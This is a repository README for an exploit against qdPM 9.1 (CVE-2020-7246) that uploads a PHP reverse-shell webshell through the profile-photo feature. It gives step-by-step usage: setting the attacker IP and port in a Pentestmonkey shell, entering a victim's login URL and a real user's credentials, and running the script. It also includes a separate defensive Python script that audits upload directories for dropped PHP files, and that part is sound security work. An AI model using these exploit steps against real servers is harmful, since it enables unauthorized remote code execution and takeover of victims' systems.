TobinShields/qdPM9.1_Exploit

qdPM v9.1 Authenticated RCE Exploit

This is an exploit to automatically upload a PHP web shell to the qdPM 9.1 platform via the "upload a profile photo" feature. This method also bypasses the fix put into place from a previous CVE

Vulnerability Information

CVE: CVE-2020-7246
NVD Published Date: 01/21/2020
Base Score: 8.8 (HIGH)
Vulnerability Type: Web Exploit / RCE

Official CVE Description:

A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

What is qdPM?

As published by the developers: "qdPM is a free web-based [LAMP] project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management."

Exploit Usage

To use this exploit, you must know the credentials of at least one user. They don’t need to have any kind of elevated privilege. You also need to have a .php web shell that you want to upload.

Configuring your webshell

You can upload your own PHP webshell with this script; however, this exploit was tested using the PHP reverse-shell webshell built by Pentestmonkey (which is included in this repo). Make sure that you configure your webshell to call back to the attacker machine, and make note of the port that it sends the reverse shell to. If you are using the webshell that is included, open the .php file and modify the following two lines found near the top:

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Configuring the Exploit Script

Next, you need to open the qdPM9.1_exploit.py script and then modify the values near the top of the script:

login_url = "http://[victim_domain]/path/to/qdPM/index.php/login"
username = "jsmith@example.com" # This should be a real user's email
password = "Pa$$w0rd" # This should be the real user's password
payload = "/path/to/payload.php"
listner_port = 1234 # This should match your PHP payload
connection_delay = 2 # Increase this value if you have a slow connection and are experiencing issues

Running the Exploit

Once the payload and the exploit script have been updated, you simply run the script from the terminal:

python3 ./qdPM9.1_exploit.py

If you get hit with dependency errors you may need to install BeautifulSoup4 and/or requests:

pip3 install bs4
pip3 install requests
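As an added defender-side example (not part of this repository or of qdPM itself), the following Python script audits a profile-photo upload directory for the two conditions the CVE description above relies on: the directory's .htaccess having been removed or weakened, and a PHP file sitting where only images should be (including double extensions such as name.php.jpg and PHP tags hidden inside a file with an image extension). The directory layout, the accepted .htaccess directives and the sample files it builds are assumptions constructed for illustration, not taken from the qdPM source.

```python
"""Audit a qdPM-style profile-photo upload directory for dropped web shells.

Defensive check for the weakness behind CVE-2020-7246: the profile-photo
directory is expected to hold only images, and its .htaccess is what stops
the web server from executing anything else. The audit flags a missing or
weakened .htaccess, any file with a server-executable extension anywhere in
its name, any file containing a PHP open tag, and any file whose magic bytes
do not match the image type its extension claims.
Directory layout and .htaccess contents are assumptions for illustration.
"""
import re
import tempfile
from pathlib import Path

# Extensions a PHP-capable web server may execute (assumption: a typical Apache/mod_php setup).
EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}

# Magic bytes for the image types a profile photo is expected to be.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# "<?php" or the short echo tag "<?="; a real photo will essentially never contain these.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def htaccess_blocks_php(directory: Path) -> bool:
    """True if .htaccess exists and carries a directive that disables PHP execution.
    The accepted directives are an assumption about how a hardened upload dir is configured."""
    ht = directory / ".htaccess"
    if not ht.is_file():
        return False
    text = ht.read_text(errors="replace").lower()
    return ("php_flag engine off" in text
            or "removehandler" in text
            or "sethandler" in text          # e.g. SetHandler default-handler
            or "deny from all" in text
            or "require all denied" in text)


def audit_upload_dir(directory) -> list:
    """Return a sorted list of (relative_path, reason) findings for the directory."""
    directory = Path(directory)
    findings = []
    if not htaccess_blocks_php(directory):
        findings.append((".htaccess", "missing or does not disable PHP execution"))
    for path in sorted(directory.rglob("*")):
        if not path.is_file() or path.name == ".htaccess":
            continue
        rel = path.relative_to(directory).as_posix()
        suffixes = [s.lower() for s in path.suffixes]      # ['.php', '.jpg'] for shell.php.jpg
        if any(s in EXECUTABLE_EXTS for s in suffixes):
            findings.append((rel, f"executable extension in name {suffixes}"))
        data = path.read_bytes()
        if PHP_TAG.search(data):
            findings.append((rel, "contains a PHP open tag"))
        ext = path.suffix.lower()
        if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
            findings.append((rel, f"magic bytes do not match {ext}"))
    return sorted(findings)


def build_sample_dir() -> str:
    """Create a constructed upload directory: one benign photo, one PHP file with an
    image extension, one double-extension file and one plain .php in a subfolder.
    All contents are constructed sample data, not real artefacts."""
    root = Path(tempfile.mkdtemp(prefix="qdpm_audit_"))
    # An intact .htaccess that disables PHP execution here (assumed content).
    (root / ".htaccess").write_text("php_flag engine off\nRemoveHandler .php\n")
    (root / "alice.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    (root / "bob.png").write_bytes(b"<?php /* constructed marker, not a real shell */ ?>")
    (root / "carol.php.jpg").write_bytes(b"\xff\xd8\xff" + b"\x00" * 16)
    sub = root / "users"
    sub.mkdir()
    (sub / "shell.php").write_bytes(b"<?php /* constructed marker */ ?>")
    return str(root)


if __name__ == "__main__":
    for rel, reason in audit_upload_dir(build_sample_dir()):
        print(f"{rel}: {reason}")
```

Run it against the real upload directory instead of the constructed one (for example from cron or a file-integrity job) and treat any finding as an incident: a legitimate profile photo never needs an executable extension or a PHP tag, and a vanished .htaccess is exactly the precondition the path-traversal delete in this CVE creates. The magic-byte check is deliberately strict rather than clever, since the point is to catch a file that the upload filter accepted on the strength of its name alone.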

A Full PoC Walkthrough + Written Guide

If you want to see how this exploit works in detail along with a breakdown of how the script was developed then check out my blog post on the subject!

Disclaimer

This script was developed to better understand CVE-2020-7246 and build upon the PoC that already exists. This script should only be used for educational purposes.
